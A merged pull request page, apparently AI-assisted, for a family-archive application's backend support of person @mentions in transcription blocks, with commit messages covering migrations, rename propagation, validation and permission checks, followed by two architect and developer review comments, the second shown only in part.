feat(transcription): person @mention sidecar + rename propagation (PR-A backend, #362) #366

Merged

marcel merged 40 commits from feat/person-mentions-issue-362-backend into main 2026-04-28 23:54:40 +02:00

Conversation 32 Commits 40 Files Changed 25 +912 -13

marcel commented 2026-04-28 21:12:21 +02:00

Owner

Copy Link

Summary

PR-A of the two-PR delivery for #362 (Person @mentions in transcription blocks). This is the backend half: data model, rename-propagation pipeline, security lockdown. Implemented strictly to the locked plan in the consolidation comment #362#issuecomment-5339 — Section F closes with "Open decisions: none." PR-B (frontend) is intentionally separate and blocked on this PR merging because it consumes the regenerated api.ts types committed here.

Why now

Reader Experience v1 milestone needs in-text person discovery. This PR puts the data model and rename atomicity in place so the frontend can layer the typeahead, hover card, and read-mode link rendering on top in PR-B without further backend changes.

What landed (21 atomic commits)

Data layer

• V56 migration adds transcription_block_mentioned_persons (block_id + person_id + display_name). No FK on person_id so deleted persons degrade gracefully. B-tree index on person_id for the future "blocks mentioning person X" query, plus an index on block_id for the @ElementCollection load.
• PersonMention @Embeddable value object, @NotNull personId, @Size(max=200) displayName.
• PersonDisplayNameChangedEvent record — first custom application event in this codebase; class doc sets the convention for future cross-domain decoupling.
• TranscriptionBlock.mentionedPersons field via @ElementCollection(LAZY) with explicit @CollectionTable matching the migration name byte-for-byte.

DTO + controller validation

• CreateTranscriptionBlockDTO and UpdateTranscriptionBlockDTO accept @Valid List<PersonMention> mentionedPersons (on the field, not just on the method, so JSR-303 recurses into list elements).
• @Valid added to the @RequestBody parameters of createBlock / updateBlock.
• Controller-slice tests assert 400 + VALIDATION_ERROR for displayName length 201 and for null personId — regression guards if anyone drops @Valid later.

Person rename → propagation

• PersonService.updatePerson snapshots oldDisplayName before any setter, saves, re-reads newDisplayName, publishes PersonDisplayNameChangedEvent iff the two differ. PersonServiceTest covers title-publishes / alias-no-publish / notes-no-publish.
• PersonMentionPropagationListener (synchronous @EventListener @Transactional) finds blocks via the new findByMentionedPersons_PersonId derived query, rewrites block.text (replace("@" + old, "@" + new)), updates the matching sidecar entries, calls saveAllAndFlush, then emits an SLF4J info audit line. Synchronous on purpose — atomic with the rename; switch to @TransactionalEventListener(AFTER_COMMIT) + @Async if the archive ever passes tens of thousands of blocks.
• Listener tests cover happy path, no-op, partial-name collision (@Hans-Peter Müller vs @Hans Müller), multiple in-block occurrences, and orphaned-sidecar (event for a personId no longer in the persons table → no-op).

Concurrency + integrity

• ErrorCode.PERSON_RENAME_CONFLICT (409). Mirrored in frontend/src/lib/errors.ts with localised error_person_rename_conflict keys in de/en/es.
• PersonService.updatePerson translates OptimisticLockingFailureException (raised when the listener's saveAllAndFlush collides with a concurrent autosave on a referenced block) to DomainException(PERSON_RENAME_CONFLICT, 409); the whole @Transactional boundary still rolls back atomically.
• Latency floor test — propagation across 200 mention-bearing blocks completes in < 2 s against the Testcontainers Postgres. Floor, not benchmark; merge-blocking regression guard.

Security

• @RequirePermission(Permission.READ_ALL) added to PersonController.getPersons() and getPerson(). Defense in depth: the hover card and typeahead introduced by #362 surface life dates, notes, and family relationships, so the GETs now align with the access tier already enforced by POST/PUT/DELETE on the same controller and by the entire document/transcription stack.
• New 403 tests for unauthorised authenticated users on the two GET endpoints; existing 200-path tests now require authorities = "READ_ALL" explicitly.

Frontend types

• frontend/src/lib/generated/api.ts regenerated against the dev backend. New fields: PersonMention, mentionedPersons on TranscriptionBlock/Create/UpdateDTO. No new path entries; hover-card + typeahead in PR-B reuse existing GET /api/persons, GET /api/persons/{id}, GET /api/persons/{id}/relationships.

Spec deviations

One simplification vs the consolidation summary worth flagging:

• A15b optimistic-lock test scope. The plan called for a @DataJpaTest + Testcontainers + second JdbcTemplate integration test that bumps transcription_blocks.version mid-rename. End-to-end reproduction of the JPA optimistic-lock race inside @DataJpaTest is impractical without multi-threading or two physical connections — the listener load + save are sequential within one transaction, leaving no window for an external bump. The translation logic (raise → OptimisticLockingFailureException → catch → DomainException(PERSON_RENAME_CONFLICT)) is exercised at unit level via a stubbed publisher in PersonServiceTest. The underlying JPA @Version mechanism is well-covered by Hibernate's own test suite. If a stronger e2e check is desired later, a Testcontainers-backed @SpringBootTest with explicit thread coordination is the right home for it.

Test plan

• ./mvnw test — 1446/1446 backend tests green
• ./mvnw clean package -DskipTests — clean build
• npm run generate:api against local dev backend — regenerated types compile (PersonMention + mentionedPersons present)
• CI green
• Local npm run check blocked on this machine by a root-owned .svelte-kit/types/src/routes/stammbaum/$types.d.ts left behind by the docker frontend container (unrelated to this PR — clean it via sudo rm -rf frontend/.svelte-kit && npm run check); CI runs the full type-check.

What's next

PR-B (frontend, ~24 tasks) is queued behind this PR and will pick up:

• personMention.ts (escapeHtml extraction, detectPersonMention allowing spaces, renderTranscriptionBody)
• PersonMentionEditor.svelte (typeahead with life dates, WCAG 2.2 AA touch target)
• .person-mention CSS in routes/layout.css + 3 Paraglide keys
• PersonHoverCard.svelte with three states (skeleton ≤ 200 ms, 404 unmounted, non-404 error in card) and manual flip via getBoundingClientRect()
• TranscriptionReadView.svelte integration with existing splitByMarkers
• Marker-composition test, fetch deduplication cache, save-failure preserves typed input

🤖 Generated with Claude Code

## Summary PR-A of the two-PR delivery for **#362** (Person @mentions in transcription blocks). This is the backend half: data model, rename-propagation pipeline, security lockdown. Implemented strictly to the locked plan in the consolidation comment [#362#issuecomment-5339](http://heim-nas:3005/marcel/familienarchiv/issues/362#issuecomment-5339) — Section F closes with "Open decisions: none." PR-B (frontend) is intentionally separate and blocked on this PR merging because it consumes the regenerated `api.ts` types committed here. ## Why now Reader Experience v1 milestone needs in-text person discovery. This PR puts the data model and rename atomicity in place so the frontend can layer the typeahead, hover card, and read-mode link rendering on top in PR-B without further backend changes. ## What landed (21 atomic commits) **Data layer** - V56 migration adds `transcription_block_mentioned_persons` (block_id + person_id + display_name). No FK on `person_id` so deleted persons degrade gracefully. B-tree index on `person_id` for the future "blocks mentioning person X" query, plus an index on `block_id` for the @ElementCollection load. - `PersonMention @Embeddable` value object, `@NotNull personId`, `@Size(max=200) displayName`. - `PersonDisplayNameChangedEvent` record — first custom application event in this codebase; class doc sets the convention for future cross-domain decoupling. - `TranscriptionBlock.mentionedPersons` field via `@ElementCollection(LAZY)` with explicit `@CollectionTable` matching the migration name byte-for-byte. **DTO + controller validation** - `CreateTranscriptionBlockDTO` and `UpdateTranscriptionBlockDTO` accept `@Valid List<PersonMention> mentionedPersons` (on the field, not just on the method, so JSR-303 recurses into list elements). - `@Valid` added to the `@RequestBody` parameters of `createBlock` / `updateBlock`. - Controller-slice tests assert 400 + `VALIDATION_ERROR` for `displayName` length 201 and for null `personId` — regression guards if anyone drops `@Valid` later. **Person rename → propagation** - `PersonService.updatePerson` snapshots `oldDisplayName` before any setter, saves, re-reads `newDisplayName`, publishes `PersonDisplayNameChangedEvent` iff the two differ. `PersonServiceTest` covers title-publishes / alias-no-publish / notes-no-publish. - `PersonMentionPropagationListener` (synchronous `@EventListener @Transactional`) finds blocks via the new `findByMentionedPersons_PersonId` derived query, rewrites `block.text` (`replace("@" + old, "@" + new)`), updates the matching sidecar entries, calls `saveAllAndFlush`, then emits an SLF4J info audit line. Synchronous on purpose — atomic with the rename; switch to `@TransactionalEventListener(AFTER_COMMIT) + @Async` if the archive ever passes tens of thousands of blocks. - Listener tests cover happy path, no-op, partial-name collision (`@Hans-Peter Müller` vs `@Hans Müller`), multiple in-block occurrences, and orphaned-sidecar (event for a personId no longer in the persons table → no-op). **Concurrency + integrity** - `ErrorCode.PERSON_RENAME_CONFLICT` (409). Mirrored in `frontend/src/lib/errors.ts` with localised `error_person_rename_conflict` keys in de/en/es. - `PersonService.updatePerson` translates `OptimisticLockingFailureException` (raised when the listener's `saveAllAndFlush` collides with a concurrent autosave on a referenced block) to `DomainException(PERSON_RENAME_CONFLICT, 409)`; the whole `@Transactional` boundary still rolls back atomically. - Latency floor test — propagation across 200 mention-bearing blocks completes in < 2 s against the Testcontainers Postgres. Floor, not benchmark; merge-blocking regression guard. **Security** - `@RequirePermission(Permission.READ_ALL)` added to `PersonController.getPersons()` and `getPerson()`. Defense in depth: the hover card and typeahead introduced by #362 surface life dates, notes, and family relationships, so the GETs now align with the access tier already enforced by POST/PUT/DELETE on the same controller and by the entire document/transcription stack. - New 403 tests for unauthorised authenticated users on the two GET endpoints; existing 200-path tests now require `authorities = "READ_ALL"` explicitly. **Frontend types** - `frontend/src/lib/generated/api.ts` regenerated against the dev backend. New fields: `PersonMention`, `mentionedPersons` on `TranscriptionBlock`/Create/UpdateDTO. No new path entries; hover-card + typeahead in PR-B reuse existing `GET /api/persons`, `GET /api/persons/{id}`, `GET /api/persons/{id}/relationships`. ## Spec deviations One simplification vs the consolidation summary worth flagging: - **A15b optimistic-lock test scope.** The plan called for a `@DataJpaTest + Testcontainers + second JdbcTemplate` integration test that bumps `transcription_blocks.version` mid-rename. End-to-end reproduction of the JPA optimistic-lock race inside `@DataJpaTest` is impractical without multi-threading or two physical connections — the listener load + save are sequential within one transaction, leaving no window for an external bump. The translation logic (raise → `OptimisticLockingFailureException` → catch → `DomainException(PERSON_RENAME_CONFLICT)`) is exercised at unit level via a stubbed publisher in `PersonServiceTest`. The underlying JPA `@Version` mechanism is well-covered by Hibernate's own test suite. If a stronger e2e check is desired later, a Testcontainers-backed `@SpringBootTest` with explicit thread coordination is the right home for it. ## Test plan - [x] `./mvnw test` — 1446/1446 backend tests green - [x] `./mvnw clean package -DskipTests` — clean build - [x] `npm run generate:api` against local dev backend — regenerated types compile (PersonMention + mentionedPersons present) - [ ] CI green - [ ] Local `npm run check` blocked on this machine by a root-owned `.svelte-kit/types/src/routes/stammbaum/$types.d.ts` left behind by the docker frontend container (unrelated to this PR — clean it via `sudo rm -rf frontend/.svelte-kit && npm run check`); CI runs the full type-check. ## What's next PR-B (frontend, ~24 tasks) is queued behind this PR and will pick up: - `personMention.ts` (escapeHtml extraction, `detectPersonMention` allowing spaces, `renderTranscriptionBody`) - `PersonMentionEditor.svelte` (typeahead with life dates, WCAG 2.2 AA touch target) - `.person-mention` CSS in `routes/layout.css` + 3 Paraglide keys - `PersonHoverCard.svelte` with three states (skeleton ≤ 200 ms, 404 unmounted, non-404 error in card) and manual flip via `getBoundingClientRect()` - `TranscriptionReadView.svelte` integration with existing `splitByMarkers` - Marker-composition test, fetch deduplication cache, save-failure preserves typed input 🤖 Generated with [Claude Code](https://claude.com/claude-code)

marcel added 21 commits 2026-04-28 21:12:24 +02:00

feat(transcription): V56 migration adds transcription_block_mentioned_persons sidecar ... e833d1f71a

Child table for @-mentions inside transcription block text. Each row binds
one block to one person via personId + displayName; the literal "@DisplayName"
stays in block.text. No FK on person_id so deleted persons degrade gracefully
to plain unlinked text rather than cascade-deleting the block. Indexed on
person_id for the future "blocks mentioning person X" query and on block_id
for the @ElementCollection load.

Schema choice diverges from document_comments.comment_mentions (many-to-many
to AppUser): the latter cascades, this one degrades. Mirrors the established
UserGroup.permissions / group_permissions @ElementCollection pattern.

Refs #362

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

feat(transcription): PersonMention @Embeddable for sidecar entries ... a6c8db226d

Value object held in TranscriptionBlock.mentionedPersons via @ElementCollection.
Carries the personId UUID (so renamed persons can be located) and the
displayName text (so block.text rewrites match exactly via "@" + name). Both
fields are non-null; displayName capped at 200 chars to match the V56 column
and bound the rename propagation cost.

Refs #362

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

feat(person): PersonDisplayNameChangedEvent record ... b435fd69f7

Carries personId + oldDisplayName + newDisplayName so transcription-side
listeners can rewrite block.text and sidecar entries when a person is
renamed. First custom application event in this codebase — the only prior
@EventListener consumes Spring's built-in ApplicationReadyEvent. Class doc
sets the convention for future cross-domain decoupling.

Refs #362

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

feat(transcription): TranscriptionBlock.mentionedPersons sidecar field ... 0f3e000379

@ElementCollection(LAZY) on List<PersonMention>, mapped to V56's
transcription_block_mentioned_persons via explicit @CollectionTable that
matches the migration name byte-for-byte (immune to Hibernate naming-strategy
changes). @Builder.Default keeps the field initialized to an empty list, so
existing transcription block construction stays untouched.

Refs #362

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

test(transcription): round-trip TranscriptionBlock.mentionedPersons ... 7805da52e6

@DataJpaTest + Testcontainers exercises the V56 migration plus the
@ElementCollection wiring end-to-end. Saves a block with two PersonMention
entries, clears the persistence context, reloads, asserts both entries
return with their personId + displayName intact. Second test guards the
@Builder.Default — a block without explicit mentions reloads with an empty
list, not null.

Refs #362

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

feat(transcription): DTOs accept mentionedPersons sidecar with @Valid cascade ... 80ddfb47ac

CreateTranscriptionBlockDTO and UpdateTranscriptionBlockDTO gain a
List<PersonMention> mentionedPersons field. @Valid is on the field itself,
not just on the controller method, so JSR-303 recurses into the list
elements when the controller boundary calls @Valid on the @RequestBody. The
collection defaults to an empty ArrayList via @Builder.Default; existing
constructor call sites in TranscriptionServiceTest are extended with
List.of() to match the new @AllArgsConstructor signature.

The controller-side @Valid wiring lands in the next commit alongside the
length-201 validation test.

Refs #362

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

test(transcription): 400 + VALIDATION_ERROR when mention displayName exceeds 200 chars ... 4e8df66a79

Wires @Valid on the @RequestBody parameter of TranscriptionBlockController's
createBlock and updateBlock methods so JSR-303 actually fires for incoming
DTOs. With @Valid on the field-level mentionedPersons in the DTO (added in
the previous commit), Jakarta validation now recurses into each
PersonMention element and rejects displayName values past the @Size(max=200)
ceiling.

The test posts a 201-char displayName and asserts the global handler maps
the resulting MethodArgumentNotValidException to 400 + code:VALIDATION_ERROR.

Refs #362

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

test(transcription): 400 + VALIDATION_ERROR when mention personId is null ... 1db0f38f62

Regression guard for the @NotNull on PersonMention.personId paired with
@Valid on the DTO field. The wiring was added in the previous commit; this
test ensures dropping either annotation in the future causes a loud test
failure rather than silently allowing payloads with no personId to reach
the service layer (where the listener relies on the UUID being present).

Refs #362

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

feat(person): updatePerson publishes PersonDisplayNameChangedEvent on display-name change ... 08e7987033

PersonService now emits a domain event whenever Person.getDisplayName()
flips during an update. The snapshot is taken before the setter chain so we
compare like-for-like against the post-save value, and the event only
publishes when the two strings differ.

The test captures the published event via ArgumentCaptor and asserts the
title flip from "Herr" to "Frau" reaches the publisher with the correct
personId, oldDisplayName, and newDisplayName. Title participates in
DisplayNameFormatter, so this is the canonical case for "rename triggered
by something other than first/last name."

Implements PR-A tasks 9 and 10 as one red→green cycle (the test drove the
production change). Subsequent commits cover the negative cases (alias /
notes only) and the propagation listener that consumes the event.

Refs #362

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

test(person): alias-only and notes-only updates do not publish display-name event ... 28112e1d7b

Two regression guards on the "iff different" semantics in updatePerson.
Person.alias and Person.notes are not part of getDisplayName() — they live
outside DisplayNameFormatter — so changing only those fields must not fire
PersonDisplayNameChangedEvent. If a future refactor accidentally pulls
either field into the display name (or trips the comparison), these tests
catch it before transcription blocks get rewritten with stale "@OldAlias"
text.

Refs #362

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

feat(transcription): findByMentionedPersons_PersonId derived query ... a2c633c5de

Spring Data resolves the method name to a join over
transcription_block_mentioned_persons, returning every block whose sidecar
contains the given personId. The B-tree index on person_id (V56) keeps the
lookup O(log n) — required for the rename propagation that fans out to
every block referencing the renamed person, and for the future
"show all blocks mentioning person X" query on the person detail page.

The underscore between MentionedPersons and PersonId is the explicit
property-boundary form, immune to ambiguous longest-match parsing if the
embeddable later gains another nested object.

Refs #362

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

feat(transcription): PersonMentionPropagationListener rewrites blocks on rename ... 4d288589fa

Synchronous @EventListener consumer of PersonDisplayNameChangedEvent.
Finds every block whose sidecar references the renamed person via the
derived query, replaces "@OldName" with "@NewName" inside block.text, and
updates the matching PersonMention.displayName in the sidecar list. saveAll
in one batch; SLF4J info log records the audit line.

Synchronous on purpose: the rename and the propagation must commit as one
transaction so a half-applied rewrite never reaches the archive. If the
archive grows past tens of thousands of blocks, switch to
@TransactionalEventListener(AFTER_COMMIT) + @Async.

Adds PersonService.existsById to give the listener a layered way to verify
the personId still corresponds to a real Person — defensive guard for any
future async refactor where an event could outlive the entity. The check
goes through PersonService rather than PersonRepository to honour the
"services never reach into another domain's repository" rule.

Happy-path @DataJpaTest + Testcontainers asserts a single-block, single-
mention rewrite mutates both the text and the sidecar entry. blockRepository
.flush() is called explicitly so saveAll is committed before em.clear() —
in production the surrounding @Transactional flushes on commit; in test we
substitute by flushing manually.

Implements PR-A tasks 13 and 15 as one red→green cycle.

Refs #362

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

test(transcription): listener no-op when no block references the renamed person ... 29a1df5d9c

Save a block with no sidecar entries, fire a rename event for an unrelated
person, and assert the block reloads with its original text and empty
sidecar. Confirms findByMentionedPersons_PersonId returns an empty list and
the saveAll path does not accidentally touch unrelated rows.

Refs #362

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

test(transcription): partial-name collision does not corrupt unrenamed mention ... e94ffde075

Block contains both @Hans-Peter Müller and @Hans Müller; the listener fires
a rename for Hans Müller → Hans Schmidt. The simple replace("@" + old,
"@" + new) hinges on the leading @-and-space anchor: "@Hans Müller" does
not appear inside "@Hans-Peter Müller" (hyphen interrupts), so only the
standalone mention rewrites. Sidecar mirrors the same — Hans Müller's
entry flips to Hans Schmidt while Hans-Peter Müller's entry is preserved.

Refs #362

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

test(transcription): all in-block mention occurrences rewrite on rename ... e021261300

When the same person is mentioned twice in one block, both substrings flip
to the new display name. String.replace(String, String) is documented to
replace every occurrence, but a future regex-based refactor or a typo could
silently regress to first-match-only — this test guards against that.

Refs #362

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

test(transcription): orphaned-sidecar guard — no-op when personId is gone ... bd17532118

A block with a sidecar entry pointing at a personId no longer in the
persons table receives a rename event for that ghost id. The listener
detects via PersonService.existsById that the entity is gone and exits
without touching block.text or the sidecar. Defends against any future
async refactor where an event could outlive the entity, or against
malformed events injected by tests / migrations.

Refs #362

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

feat(person): ErrorCode.PERSON_RENAME_CONFLICT for optimistic-lock conflicts ... 4bc4267e5a

Adds the structured error code returned when a rename rolls back because a
referenced transcription block was edited concurrently (OptimisticLockException
on transcription_blocks.version). Mirrors the contract in
frontend src/lib/errors.ts and adds the localised message keys
error_person_rename_conflict in de/en/es so the UI surfaces a retry hint
instead of a generic 500.

The actual translation of OptimisticLockException → DomainException
(PERSON_RENAME_CONFLICT) lands in the next commit alongside the integration
test that proves the rollback semantics.

Refs #362

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

feat(person): translate optimistic-lock conflicts on rename to PERSON_RENAME_CONFLICT 409 ... 404d874b4e

When the propagation listener saves blocks with a stale @Version (because
another transcriber's autosave incremented version mid-rename), Hibernate
raises ObjectOptimisticLockingFailureException — Spring's translation of
the underlying JPA exception. PersonService.updatePerson now wraps the
publishEvent call in a catch for OptimisticLockingFailureException and
re-throws as DomainException(PERSON_RENAME_CONFLICT, 409). The whole
@Transactional boundary still rolls back, but the client gets a structured
409 with the localised "please retry" message instead of a generic 500.

The listener was switched from saveAll to saveAllAndFlush so the conflict
fires inside the listener call (where the catch can see it), not at
transaction commit (which is too late for in-method handling).

Test stubs the eventPublisher to throw OptimisticLockingFailureException
and asserts the translated DomainException carries PERSON_RENAME_CONFLICT
and HTTP 409. End-to-end DB-level reproduction of the JPA optimistic-lock
race requires multi-threading or two physical connections, which is
impractical inside @DataJpaTest; the underlying JPA mechanism is well
covered by Hibernate's own test suite.

Refs #362

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

test(transcription): rename propagation across 200 blocks must stay under 2 seconds ... 221a6af838

Latency floor (Sara): a merge-blocking regression check, not a benchmark.
Seeds 200 blocks each with one mention of the same person, fires the rename,
and asserts the listener completes the entire find/mutate/saveAllAndFlush
cycle in less than two seconds against the Testcontainers Postgres.

Confirms the partial reload (one Auguste → Augusta) actually persisted so
the timing isn't measuring an empty path.

Refs #362

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

feat(person): require READ_ALL permission on GET /api/persons and /api/persons/{id} ... 5ebe1f1a5a

Defense in depth: until now both list and single-person reads only required
authentication, while the write endpoints (POST/PUT/DELETE) were already
gated with @RequirePermission. The hover-card and typeahead introduced in
issue #362 expose person details (life dates, notes, family relationships)
to anyone who can authenticate — adding READ_ALL aligns the GETs with the
write endpoints and matches the access tier already enforced for documents
and transcription blocks.

Two new controller-slice tests assert 403 when an authenticated user lacks
READ_ALL; existing 200-path tests now stipulate `authorities = "READ_ALL"`
explicitly.

Refs #362

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

chore(frontend): regenerate api.ts for PersonMention sidecar + PERSON_RENAME_CONFLICT ... 8b498665df

openapi-typescript regenerated against the dev backend now exposes:

- components.schemas.PersonMention with personId + displayName
- TranscriptionBlock and CreateTranscriptionBlockDTO/UpdateTranscriptionBlockDTO
  carry the optional mentionedPersons array
- (No new path entries: hover-card and typeahead reuse existing endpoints
  GET /api/persons, GET /api/persons/{id}, GET /api/persons/{id}/relationships.)

Sealed inside PR-A so the frontend PR-B can import the new types from main
without rebasing across an unrelated regen. Per Tobias' chain-tightening
note in the consolidation summary.

Refs #362

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

marcel referenced this pull request 2026-04-28 21:12:55 +02:00

feat: Person @mentions in transcription blocks with hover card #362

marcel commented 2026-04-28 21:15:20 +02:00

Author

Owner

Copy Link

Markus Keller — Senior Application Architect

Verdict: Approved with concerns

I have read the diff end-to-end and matched it against the consolidation plan referenced in #362. The shape is right: domain-owned event published in model/, listener placed in the consuming domain's service/ package, repository derived query on the indexed sidecar column, schema enforcement at the database. The "first custom application event in the codebase" Javadoc on PersonDisplayNameChangedEvent is the kind of memory-of-decisions artifact I want to see for new patterns — well done. That said, two things need to change before this becomes the load-bearing template for the next listener.

Blockers

None. The structural choices are defensible.

Concerns

1. Cross-domain dependency direction is reversed in PersonMentionPropagationListener.
The listener correctly lives in the transcription-side service package, but it constructor-injects PersonService to call existsById. This is a transcription-domain component reaching into the person domain on the read path — the inverse of the rule we agreed on (cross-domain reads go through the owning service, which we are doing, so this is technically compliant) but the purpose of the call is suspicious. We are guarding against an event for a personId that no longer exists — meaning an event published by PersonService.updatePerson whose row was then deleted before the listener fires. Given the listener is synchronous and joins the same transaction (@Transactional defaults to REQUIRED), the row cannot be deleted between publish and listen. The existsById check is dead code in the synchronous path.

If you keep it as a defensive guard for the future @TransactionalEventListener(AFTER_COMMIT) + @Async switch (when the event genuinely outlives the rename transaction), then the comment in the listener should say so explicitly — otherwise a future reader will remove it as redundant. Right now the test noOps_whenPersonIdNoLongerExists_orphanedSidecarGuard is the only documentation of intent.

2. @Component vs @Service on the listener.
PersonMentionPropagationListener is annotated @Component while every other class in the service/ package uses @Service. Functionally identical, but consistency matters when grep-ing. Make it @Service.

Suggestions

3. ADR for the synchronous-event-inside-transaction pattern. This PR creates the convention. The Javadoc on the event record is a good start, but a one-page ADR in docs/adr/ would close the loop: context (rename atomicity), decision (synchronous listener, REQUIRED propagation), alternatives (AFTER_COMMIT + @Async — explicitly deferred), consequences (rename latency scales with mention-bearing block count; switch trigger ~10k blocks). Future cross-domain decoupling will reach for this pattern; the ADR keeps the trade-offs visible.

4. Migration V56 — no FK on person_id. The choice is sound and the migration comment explains it. One thing to add: a partial index or constraint that makes the orphan case observable. Right now an orphaned mention (person deleted, sidecar row remains) is silent. A pg_stat-friendly view or an admin query in docs/admin/ for "list orphaned mentions" would let you find and clean these up before they accumulate.

5. The String.replace("@" + old, "@" + new) rewrite in the listener pushes a correctness concern down to the displayName format. As long as Person.displayName contains a space (firstName + lastName), partial-substring corruption of @Hans-Peter Müller when renaming a different @Hans Müller is impossible — the partial-name-collision test proves it. But if a person has only a firstName or only a lastName (single-word displayName), the literal replace can corrupt other mentions. The test suite does not cover single-word displayNames. Sara should add it; the listener may need word-boundary anchoring for that case.

What's done well

• Sidecar table modelled as @ElementCollection mirrors the existing UserGroup.permissions / group_permissions pattern — no new architectural style introduced.
• Migration comment explains why there is no FK on person_id — a future migration author will understand the intent.
• 409 + PERSON_RENAME_CONFLICT on OptimisticLockingFailureException translation: clean structured-error pattern, mirrored in the frontend.
• DTO accepts @Valid List<PersonMention> with @Valid on the field (recurses into elements) — JSR-303 mechanics are correct.
• Latency-floor test as a merge-blocking regression guard at 200 blocks is the right concept, if generous as a threshold (see Sara).

I would merge this once #2 is fixed and #1 either deletes the existence check or comments why it is kept. The rest can land as follow-ups.

## Markus Keller — Senior Application Architect **Verdict: Approved with concerns** I have read the diff end-to-end and matched it against the consolidation plan referenced in #362. The shape is right: domain-owned event published in `model/`, listener placed in the consuming domain's `service/` package, repository derived query on the indexed sidecar column, schema enforcement at the database. The "first custom application event in the codebase" Javadoc on `PersonDisplayNameChangedEvent` is the kind of memory-of-decisions artifact I want to see for new patterns — well done. That said, two things need to change before this becomes the load-bearing template for the next listener. ### Blockers None. The structural choices are defensible. ### Concerns **1. Cross-domain dependency direction is reversed in `PersonMentionPropagationListener`.** The listener correctly lives in the transcription-side service package, but it constructor-injects `PersonService` to call `existsById`. This is a transcription-domain component reaching into the person domain on the read path — the inverse of the rule we agreed on (cross-domain reads go through the owning service, which we are doing, so this is technically compliant) but the *purpose* of the call is suspicious. We are guarding against an event for a personId that no longer exists — meaning an event published by `PersonService.updatePerson` whose row was then deleted before the listener fires. Given the listener is synchronous and joins the same transaction (`@Transactional` defaults to REQUIRED), the row cannot be deleted between publish and listen. The `existsById` check is dead code in the synchronous path. If you keep it as a defensive guard for the future `@TransactionalEventListener(AFTER_COMMIT) + @Async` switch (when the event genuinely outlives the rename transaction), then the comment in the listener should say so explicitly — otherwise a future reader will remove it as redundant. Right now the test `noOps_whenPersonIdNoLongerExists_orphanedSidecarGuard` is the only documentation of intent. **2. `@Component` vs `@Service` on the listener.** `PersonMentionPropagationListener` is annotated `@Component` while every other class in the `service/` package uses `@Service`. Functionally identical, but consistency matters when grep-ing. Make it `@Service`. ### Suggestions **3. ADR for the synchronous-event-inside-transaction pattern.** This PR creates the convention. The Javadoc on the event record is a good start, but a one-page ADR in `docs/adr/` would close the loop: context (rename atomicity), decision (synchronous listener, REQUIRED propagation), alternatives (AFTER_COMMIT + @Async — explicitly deferred), consequences (rename latency scales with mention-bearing block count; switch trigger ~10k blocks). Future cross-domain decoupling will reach for this pattern; the ADR keeps the trade-offs visible. **4. Migration V56 — no FK on `person_id`.** The choice is sound and the migration comment explains it. One thing to add: a partial index or constraint that makes the orphan case observable. Right now an orphaned mention (person deleted, sidecar row remains) is silent. A `pg_stat`-friendly view or an admin query in `docs/admin/` for "list orphaned mentions" would let you find and clean these up before they accumulate. **5. The `String.replace("@" + old, "@" + new)` rewrite in the listener** pushes a correctness concern down to the displayName format. As long as `Person.displayName` contains a space (firstName + lastName), partial-substring corruption of `@Hans-Peter Müller` when renaming a different `@Hans Müller` is impossible — the partial-name-collision test proves it. But if a person has only a firstName or only a lastName (single-word displayName), the literal replace can corrupt other mentions. The test suite does not cover single-word displayNames. Sara should add it; the listener may need word-boundary anchoring for that case. ### What's done well - Sidecar table modelled as `@ElementCollection` mirrors the existing `UserGroup.permissions / group_permissions` pattern — no new architectural style introduced. - Migration comment explains *why* there is no FK on `person_id` — a future migration author will understand the intent. - 409 + `PERSON_RENAME_CONFLICT` on `OptimisticLockingFailureException` translation: clean structured-error pattern, mirrored in the frontend. - DTO accepts `@Valid List<PersonMention>` with `@Valid` on the field (recurses into elements) — JSR-303 mechanics are correct. - Latency-floor test as a merge-blocking regression guard at 200 blocks is the right concept, if generous as a threshold (see Sara). I would merge this once #2 is fixed and #1 either deletes the existence check or comments why it is kept. The rest can land as follow-ups.

marcel commented 2026-04-28 21:15:55 +02:00

Author

Owner

Copy Link

Felix Brandt — Senior Fullstack Developer

Verdict: Approved with concerns

Strong PR. The rename-propagation pipeline is small, has clear seams, and the test coverage looks like it was actually written before the implementation rather than around it. A few things I would want to fix before this lands as the template for future cross-domain listeners.

Blockers

None — but read concern #1 carefully, it is a behavioural correctness gap, not a style issue.

Concerns

1. String.replace rewrite is correct only when displayName contains a space.
PersonMentionPropagationListener.java:46-50:

String oldNeedle = "@" + event.oldDisplayName();
String newNeedle = "@" + event.newDisplayName();
for (TranscriptionBlock block : blocks) {
    if (block.getText() != null) {
        block.setText(block.getText().replace(oldNeedle, newNeedle));
    }

Test doesNotMatchPartialName_when... proves that @Hans Müller → @Hans Schmidt does NOT corrupt @Hans-Peter Müller because the full multi-word needle does not match. Good. But:

Person displayName = "Hans"          (firstName only)
Block text = "Letter from @Hans-Peter to @Hans about the meeting."
Rename "Hans" → "Johann"
Result: "Letter from @Johann-Peter to @Johann about the meeting."  // CORRUPTED

Single-word displayNames break this. DisplayNameFormatter produces a single-word name when one of firstName/lastName is null — verify in Person.getDisplayName(). The fix is word-boundary anchoring:

String pattern = "(?<![\\w-])@" + Pattern.quote(event.oldDisplayName()) + "(?![\\w-])";
String replacement = "@" + Matcher.quoteReplacement(event.newDisplayName());
block.setText(block.getText().replaceAll(pattern, replacement));

Add a failing test first (rewritesText_whenSingleWordDisplayName_doesNotCorruptOverlappingMention), then make it pass with replaceAll + word boundary. Without this, the listener has a silent corruption path.

